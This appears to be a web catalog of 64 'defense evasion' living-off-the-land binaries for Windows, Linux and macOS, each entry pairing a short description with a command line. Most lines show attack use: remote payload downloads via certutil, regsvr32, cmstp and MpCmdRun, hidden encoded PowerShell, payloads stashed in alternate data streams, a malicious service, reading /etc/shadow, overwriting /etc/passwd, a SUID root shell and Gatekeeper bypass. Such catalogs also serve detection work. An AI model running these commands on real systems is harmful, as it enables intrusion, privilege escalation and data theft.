Defense Evasion LOLBins: AppLocker & Antivirus Bypasses
Defense evasion LOLBins bypass endpoint security controls, Application Whitelisting (AppLocker/WDAC), and script restrictions by executing code through digitally signed, trusted Microsoft or Unix utilities.
Adversaries invoke signed proxies such as installutil.exe, msbuild.exe, regsvr32.exe, or Alternate Data Streams (ADS) to bypass security software inspection.
Catalog of Defense Evasion LOLBins
Displaying 64 itemscertutil.exe
Certutil.exe is a command-line program installed as part of Certificate Services. Attackers frequently abuse it to download arbitrary files from remote URLs, encode/decode Base64 payloads to evade detection, and hash files.
certutil.exe -decode %TEMP%\encoded.txt %TEMP%\beacon.exepowershell.exe
PowerShell is a powerful task automation framework and scripting engine. Widely abused by threat actors for in-memory execution (fileless malware), credential dumping, remote command execution, and AMSI bypasses.
powershell.exe -noni -nop -w hidden -enc JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0AA==Applaunch.exe
Microsoft .NET ClickOnce Launch Utility.
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Applaunch.exe" /activate "{REMOTEURL}#APPLICATION_METADATA_HERE"Aspnet_Compiler.exe
ASP.NET Compilation Tool
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe -v none -p C:\users\cpl.internal\desktop\asptest\ -f C:\users\cpl.internal\desktop\asptest\none -uBash.exe
File used by Windows subsystem for Linux
bash.exe -c "{CMD}"Cmd.exe
The command-line interpreter in Windows
cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:{REMOTEURL:.sct} ^scrobj.dll > {PATH}:payload.batCmstp.exe
Installs or removes a Connection Manager service profile.
cmstp.exe /ni /s {REMOTEURL:.inf}Control.exe
Binary used to launch controlpanel items in Windows
control.exe {PATH_ABSOLUTE}:evil.dllDfsvc.exe
ClickOnce engine in Windows used by .NET
rundll32.exe dfshim.dll,ShOpenVerbApplication {REMOTEURL}Diantz.exe
Binary that package existing files into a cabinet (.cab) file
diantz.exe {PATH_ABSOLUTE:.exe} {PATH_ABSOLUTE}:targetFile.cabEsentutl.exe
Binary for working with Microsoft Joint Engine Technology (JET) database
esentutl.exe /y {PATH_ABSOLUTE:.exe} /d {PATH_ABSOLUTE}:file.exe /oExpand.exe
Binary that expands one or more compressed files
expand {PATH_SMB:.bat} {PATH_ABSOLUTE}:file.batExtrac32.exe
Extract to ADS, copy or overwrite a file with Extrac32.exe
extrac32 {PATH_ABSOLUTE:.cab} {PATH_ABSOLUTE}:file.exeFindstr.exe
Write to ADS, discover, or download files with Findstr.exe
findstr /V /L W3AllLov3LolBas {PATH_ABSOLUTE:.exe} > {PATH_ABSOLUTE}:file.exeForfiles.exe
Selects and executes a command on a file or set of files. This command is useful for batch processing.
forfiles /p c:\windows\system32 /m notepad.exe /c "{PATH_ABSOLUTE}:evil.exe"Installutil.exe
The Installer tool is a command-line utility that allows you to install and uninstall server resources by executing the installer components in specified assemblies
InstallUtil.exe /logfile= /LogToConsole=false /U {PATH:.dll}Makecab.exe
Binary to package existing files into a cabinet (.cab) file
makecab {PATH_ABSOLUTE:.exe} {PATH_ABSOLUTE}:autoruns.cabMavinject.exe
Used by App-v in Windows
Mavinject.exe 4172 /INJECTRUNNING {PATH_ABSOLUTE}:file.dllMicrosoft.Workflow.Compiler.exe
A utility included with .NET that is capable of compiling and executing C# or VB.net code.
Microsoft.Workflow.Compiler.exe {PATH} {PATH:.log}MpCmdRun.exe
Binary part of Windows Defender. Used to manage settings in Windows Defender
MpCmdRun.exe -DownloadFile -url {REMOTEURL:.exe} -path {PATH_ABSOLUTE:.exe}:evil.exeMsbuild.exe
Used to compile and execute code
msbuild.exe {PATH:.xml}Msdt.exe
Microsoft diagnostics tool
msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af {PATH_ABSOLUTE:.xml} /skip TRUEPrint.exe
Used by Windows to send files to the printer
print /D:{PATH_ABSOLUTE}:file.exe {PATH_ABSOLUTE:.exe}PrintBrm.exe
Printer Migration Command-Line Tool
PrintBrm -r -f {PATH_ABSOLUTE}:hidden.zip -d {PATH_ABSOLUTE:folder}Reg.exe
Used to manipulate the registry
reg export HKLM\SOFTWARE\Microsoft\Evilreg {PATH_ABSOLUTE}:evilreg.regRegasm.exe
Part of .NET
regasm.exe {PATH:.dll}Regedit.exe
Used by Windows to manipulate registry
regedit /E {PATH_ABSOLUTE}:regfile.reg HKEY_CURRENT_USER\MyCustomRegKeyRegini.exe
Used to manipulate the registry
regini.exe {PATH}:hidden.iniRegsvcs.exe
Regsvcs and Regasm are Windows command-line utilities that are used to register .NET Component Object Model (COM) assemblies
regsvcs.exe {PATH:.dll}Sc.exe
Used by Windows to manage services
sc create evilservice binPath="\"c:\\ADS\\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" DisplayName= "evilservice" start= auto\ & sc start evilserviceTar.exe
Used by Windows to extract and create archives.
tar -cf {PATH}:ads {PATH_ABSOLUTE:folder}winget.exe
Windows Package Manager tool
winget.exe install --accept-package-agreements -s msstore {name or ID}Wscript.exe
Used by Windows to execute scripts
wscript //e:vbscript {PATH}:script.vbsAdvpack.dll
Utility for installing software and drivers with rundll32.exe
rundll32.exe advpack.dll,LaunchINFSection {PATH:.inf},DefaultInstall_SingleUser,1,Dfshim.dll
ClickOnce engine in Windows used by .NET
rundll32.exe dfshim.dll,ShOpenVerbApplication {REMOTEURL}Ieadvpack.dll
INF installer for Internet Explorer. Has much of the same functionality as advpack.dll.
rundll32.exe ieadvpack.dll,LaunchINFSection {PATH_ABSOLUTE:.inf},DefaultInstall_SingleUser,1,Setupapi.dll
Windows Setup Application Programming Interface
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 {PATH_ABSOLUTE:.inf}Syssetup.dll
Windows NT System Setup
rundll32 syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 {PATH_ABSOLUTE:.inf}winrm.vbs
Script used for manage Windows RM settings
%SystemDrive%\BypassDir\cscript //nologo %windir%\System32\winrm.vbs get wmicimv2/Win32_Process?Handle=4 -format:prettyAccCheckConsole.exe
Verifies UI accessibility requirements
AccCheckConsole.exe -window "Untitled - Notepad" {PATH_ABSOLUTE:.dll}Bginfo.exe
Background Information Utility included with SysInternals Suite
bginfo.exe {PATH:.bgi} /popup /nolicpromptcoregen.exe
Binary coregen.exe (Microsoft CoreCLR Native Image Generator) loads exported function GetCLRRuntimeHost from coreclr.dll or from .DLL in arbitrary path. Coregen is located within "C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\" or another version of Silverlight. Coregen is signed by Microsoft and bundled with Microsoft Silverlight.
coregen.exe /L {PATH_ABSOLUTE:.dll} dummy_assembly_nameDotnet.exe
dotnet.exe comes with .NET Framework
dotnet.exe {PATH:.dll}Fsi.exe
64-bit FSharp (F#) Interpreter included with Visual Studio and DotNet Core SDK.
fsi.exe {PATH:.fsscript}FsiAnyCpu.exe
32/64-bit FSharp (F#) Interpreter included with Visual Studio.
fsianycpu.exe {PATH:.fsscript}Msdeploy.exe
Microsoft tool used to deploy Web Applications.
msdeploy.exe -verb:sync -source:RunCommand -dest:runCommand="{PATH_ABSOLUTE:.bat}"msxsl.exe
Command line utility used to perform XSL transformations.
msxsl.exe {PATH:.xml} {PATH:.xsl}rcsi.exe
Non-Interactive command line inerface included with Visual Studio.
rcsi.exe {PATH:.csx}Remote.exe
Debugging tool included with Windows Debugging Tools
Remote.exe /s {PATH:.exe} anythinghereSquirrel.exe
Binary to update the existing installed Nuget/squirrel package. Part of Microsoft Teams installation.
squirrel.exe --update {REMOTEURL}Tracker.exe
Tool included with Microsoft .Net Framework.
Tracker.exe /d {PATH:.dll} /c C:\Windows\write.exeUpdate.exe
Binary to update the existing installed Nuget/squirrel package. Part of Microsoft Teams installation.
Update.exe --update={REMOTEURL}VisualUiaVerifyNative.exe
A Windows SDK binary for manual and automated testing of Microsoft UI Automation implementation and controls.
VisualUiaVerifyNative.exevstest.console.exe
VSTest.Console.exe is the command-line tool to run tests
vstest.console.exe {PATH:.dll}Wfc.exe
The Workflow Command-line Compiler tool is included with the Windows Software Development Kit (SDK).
wfc.exe {PATH_ABSOLUTE:.xoml}base64
Base64 encodes or decodes standard input or files to standard output. Attackers abuse it to read sensitive files without user permissions (when SUID) or decode obfuscated payload stages.
base64 /etc/shadow | base64 --decodecp
GNU cp copies files. When configured with SUID permissions, attackers can overwrite system authentication files like /etc/passwd or copy binaries with elevated attributes.
cp /tmp/passwd_modified /etc/passwdchmod
Chmod alters file mode bits. SUID or sudo chmod is abused to turn standard shells into persistent SUID root binaries by adding the 4755 permission bit.
chmod 4755 /bin/dashchown
Chown changes file owner and group. SUID chown allows users to claim ownership of root-owned scripts or binaries and subsequently modify them.
chown $(id -u):$(id -g) /etc/shadowpkgutil
Pkgutil queries and extracts installer packages. Attackers use pkgutil --expand to decompress package payloads and extract scripts without triggering installation gatekeeper checks.
pkgutil --expand /tmp/installer.pkg /tmp/extracted_pkgtccutil
Tccutil manages the Transparency, Consent, and Control (TCC) privacy database. Attackers reset permissions for applications to force prompt re-evaluation or test TCC bypasses.
tccutil reset All com.apple.Terminalnetworksetup
Networksetup configures macOS network preferences. Attackers abuse it to configure rogue HTTP web proxies or reassign DNS servers to malicious resolvers.
networksetup -setwebproxy "Wi-Fi" 127.0.0.1 8080ditto
Ditto copies directories while preserving extended attributes, HFS metadata, and resource forks. Attackers use it to archive sensitive folders prior to exfiltration.
ditto -c -k --sequesterRsrc /Users/victim/Documents /tmp/docs.zipxattr
Xattr displays and modifies extended filesystem attributes. Attackers execute xattr -d com.apple.quarantine on downloaded malware to bypass Gatekeeper execution blocks.
xattr -d com.apple.quarantine /path/to/implant.app